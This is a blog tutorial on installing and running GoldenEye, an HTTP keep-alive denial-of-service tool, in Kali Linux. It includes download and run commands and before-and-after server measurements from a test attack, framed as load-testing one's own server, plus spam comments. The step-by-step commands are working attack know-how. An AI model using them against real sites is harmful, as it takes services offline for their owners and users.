DoS website in Kali Linux using GoldenEye

I’ve talked about testing few DoS tools that can put heavy load on HTTP servers in order to bring them to their knees by exhausting resource pools. GoldenEye is the first of those tools and it is one of the newest I discovered in GitHub. You can DoS websites with GoldenEye and bring it down almost within 30 seconds depending on how big their memory pool is. Of course, it wont work on protected servers and servers behind a proper WAF, IDS, but this is a great tool to test your own Web Server for load testing and amend your iptables/Firewall rules accordingly.

You can also DoS using hping3 to simulate similar attacks or PHP exploit to attack WordPress websites. There’s also few great tools that will allow you view live DDoS attacks maps worldwide in almost realtime.

DoS website in Kali Linux using GoldenEye - blackMORE OpsDetails for GoldenEye tool is listed below:

From GoldenEye’s writer’s post:

  1. This tool is meant for research purposes only and any malicious usage of this tool is prohibited.
  2. GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
  3. GoldenEye is a HTTP DoS Test Tool.
  4. Attack Vector exploited: HTTP Keep Alive + NoCache

Types of DoS or DDoS attacks

Let’s go over some very basic info regarding DoS or DDoS attacks. There are basically three types of DoS and DDoS attacks:

  1. Application layer DoS and DDoS attacks
  2. Protocol layer DoS and DDoS attacks
  3. Volume-based DoS and DDoS attacks

Application layer DoS and DDoS attacks

Application-layer DoS and DDoS attacks are attacks that target Windows, Apache, OpenBSD, or other software vulnerabilities to perform the attack and crash the server.

Protocol layer DoS and DDoS attacks

A protocol DoS and DDoS attacks is an attack on the protocol level. This category includes Synflood, Ping of Death, and more.

Volume-based DoS and DDoS attacks attacks

This type of DoS and DDoS attacks includes ICMP floods, UDP floods, and other kind of floods performed via spoofed packets.

The word DoS and DDoS is used loosely as when you attack from a single machine, it’s usually considered as a DoS attack. Multiply a single attacker from a botnet (or a group) then it becomes a DDoS attack. There are many explanations to it, but just know that no matter which type of attack it is, they are equally detrimental for a server/network.

GoldenEye Help Menu- Click to expand

GoldenEye Help Menu- Click to expand


     /$$$$$$            /$$       /$$                     /$$$$$$$$                    
    /$$__  $$          | $$      | $$                    | $$_____/                    
   | $$  \__/  /$$$$$$ | $$  /$$$$$$$  /$$$$$$  /$$$$$$$ | $$       /$$   /$$  /$$$$$$ 
   | $$ /$$$$ /$$__  $$| $$ /$$__  $$ /$$__  $$| $$__  $$| $$$$$   | $$  | $$ /$$__  $$
   | $$|_  $$| $$  \ $$| $$| $$  | $$| $$$$$$$$| $$  \ $$| $$__/   | $$  | $$| $$$$$$$$
   | $$  \ $$| $$  | $$| $$| $$  | $$| $$_____/| $$  | $$| $$      | $$  | $$| $$_____/
   |  $$$$$$/|  $$$$$$/| $$|  $$$$$$$|  $$$$$$$| $$  | $$| $$$$$$$$|  $$$$$$$|  $$$$$$$
    \______/  \______/ |__/ \_______/ \_______/|__/  |__/|________/ \____  $$ \_______/
                                                                     /$$  | $$          
                                                                    |  $$$$$$/          
                                                                     \______/           

This tool is a dos tool that is meant to put heavy load on HTTP servers
in order to bring them to their knees by exhausting the resource pool.

This tool is meant for research purposes only
and any malicious usage of this tool is prohibited.

@author Jan Seidl <http://wroot.org/>

@date 2014-02-18
@version 2.1

@TODO Test in python 3.x

LICENSE:
This software is distributed under the GNU General Public License version 3 (GPLv3)

LEGAL NOTICE:
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!
IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY
THE AUTHOR (or blackMORE Ops / darkMORE Ops) DOES NOT TAKE ANY RESPONSIBILITY FOR IT.
BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.

 

USAGE: ./goldeneye.py  [OPTIONS]

 OPTIONS:
    Flag           Description                     Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -h, --help         Shows this help

Download GoldenEye

I prefer to make a folder for everything. I will just do that. You do what you need to do.

root@kali:~# mkdir GoldenEye
root@kali:~# 
root@kali:~# cd GoldenEye/
root@kali:~/GoldenEye# 
root@kali:~/GoldenEye# wget https://github.com/jseidl/GoldenEye/archive/master.zip
root@kali:~/GoldenEye#

So I made a folder named ‘GoldenEye‘ and changed directory to that. Then used wget to pull down the master archive.

DoS-website-with-GoldenEye-Layer-7-DoS-tool-with-KeepAlive-NoCache-blackMORE-Ops-2

Once download completes, unzip the master.zip file.

root@kali:~/GoldenEye# unzip master.zip

DoS-website-with-GoldenEye-Layer-7-DoS-tool-with-KeepAlive-NoCache-blackMORE-Ops-3

This creates a new folder named GoldenEye-master.

root@kali:~/GoldenEye# 
root@kali:~/GoldenEye# ls
GoldenEye-master master.zip
root@kali:~/GoldenEye# 
root@kali:~/GoldenEye# cd GoldenEye-master/
root@kali:~/GoldenEye/GoldenEye-master# 
root@kali:~/GoldenEye/GoldenEye-master# ls
goldeneye.py README.md res util
root@kali:~/GoldenEye/GoldenEye-master#

DoS-website-with-GoldenEye-Layer-7-DoS-tool-with-KeepAlive-NoCache-blackMORE-Ops-4

Run GoldenEye – DoS website

This is rather easy. Following is the usage of goldeneye.py.

USAGE: ./goldeneye.py <url> [OPTIONS]

 OPTIONS:
    Flag           Description                     Default
    -u, --useragents   File with user-agents to use                     (default: randomly generated)
    -w, --workers      Number of concurrent workers                     (default: 50)
    -s, --sockets      Number of concurrent sockets                     (default: 30)
    -m, --method       HTTP Method to use 'get' or 'post'  or 'random'  (default: get)
    -d, --debug        Enable Debug Mode [more verbose output]          (default: False)
    -h, --help         Shows this help

You should schedule and announce your test window so users are aware of the possibility of an outage. Often simulations result in actual failures.

Under NO Circumstances should you run a DoS simulation/test attack against your environment without first notifying your hosting provider. This is especially true for external / full stack tests that will be going through your provider’s network.

Depending on your Linux, Windows or Mac distribution, (any OS that supports Python would do), you just use the following command:

root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
sudo ./goldeneye.py http://www.goldeneyetestsite.com/
(or)
python goldeneye.py http://www.goldeneyetestsite.com/

Depending on where you’ve saved the files, adjust your path and command.

Following is taken from my tests:

The attack

root@kali:~/GoldenEye/GoldenEye-master# ./goldeneye.py http://10.0.0.101/ 

GoldenEye v2.1 by Jan Seidl <jseidl@wroot.org>

Hitting webserver in mode 'get' with 10 workers running 500 connections each. Hit CTRL+C to cancel.
^CCTRL+C received. Killing all workers
Shutting down GoldenEye
root@kali:~/GoldenEye/GoldenEye-master#

The whole attack lasted only 30 seconds.

The result

This is what I’ve seen in the server end

Before attack

root@someserver [~]# free -m
total used free shared buffers cached
Mem: 1024 713 302 49 9 150
-/+ buffers/cache: 552 1001
Swap: 9990 40 160

root@someserver [~]# pgrep httpd | wc -l
11

I had a massive pool of free memory and just 11 httpd workers.

After attack

root@serv1 [~]# free -m
 total used free shared buffers cached
Mem: 1024 101 90 49 9 150
-/+ buffers/cache: 3544 190
Swap: 990 40 150
root@someserver [~]# pgrep httpd | wc -l
174

I’ve now got just 101M free memory and 174 httpd workers.

Took only 15 seconds to push this server to it limit. Next we look analyse the attack that reveals interesting outcomes achieved by this DoS tool.

Check Also

Correct way of installing VirtualBox Guest Additions in Kali Linux 2016.2/2017 (Kali Rolling)

How to install VirtualBox Guest Additions in Kali Linux (Kali Rolling / Kali Linux 2016.2 / Kali 2017)

Since Kali Linux 2016 came out (also known as Kali Rolling), it seems that Official …

Run Kali Linux in Microsoft Azure on SSD for free - blackMORE Ops - 1

Run Kali Linux in Microsoft Azure on SSD for free

Big news for Kali Linux users, now you can run Kali Linux in Microsoft Azure …

14 comments

  1. nice writeup. maybe one about slowloris someday?

  2. Very nice write up. I attacked my internet mail server ( Exchange 2013 ) and after running it twice I wasn’t able to connect from the outside anymore. Perhaps you can advise people to test this that they use an internal webserver like exchange so no illegal activities is done on the network of the provider. Once again, great write up!

  3. What’s up it’s me, I am also visiting this web site daily, this web page is really nice and the users are in fact sharing nice thoughts.

  4. I was recommended this blog through my cousin. I am no longer positive whether
    or not this put up is written through him as no one else know such distinct approximately my problem.
    You are wonderful! Thank you!

  5. Do you have any video of that? I’d want to find out more details.

  6. I think everything said made a great deal of sense.
    However, consider this, what if you added a little content?
    I am not suggesting your information isn’t good., but suppose you added a title to possibly grab a person’s
    attention? I mean DoS website in Kali Linux using GoldenEye –
    blackMORE Ops is a little boring. You could look at
    Yahoo’s home page and note how they create article
    headlines to get viewers to open the links. You might try adding a video or a picture
    or two to get readers excited about everything’ve written. In my opinion, it could make your posts a little bit more interesting.

  7. Good article! We will be linking to this great article on our website.
    Keep up the great writing.

  8. If some one needs to be updated with latest technologies then he must be pay a visit
    this site and be up to date every day.

  9. Hey there outstanding blog! Does running a blog similar to this take a large amount of work?
    I have very little understanding of programming but I
    was hoping to start my own blog in the near future. Anyways, if you have any recommendations or
    tips for new blog owners please share. I know this is off subject but I simply had to ask.
    Thanks a lot!

  10. whoah this weblog is excellent i like reading your posts.

    Stay up the good work! You recognize, a lot of persons are searching around for this information, you could aid them greatly.

  11. Attractive element of content. I just stumbled upon your blog and in accession capital to assert that I get in fact loved account your blog posts.

    Anyway I will be subscribing for your augment and even I achievement you access consistently rapidly.

  12. Awesome issues here. I’m very satisfied to
    peer your post. Thank you so much and I’m having a look ahead to contact you.
    Will you please drop me a mail?

Leave a Reply. (Anonymous comments allowed). Use WP, Twitter, FaceBook or Google+ for faster responses.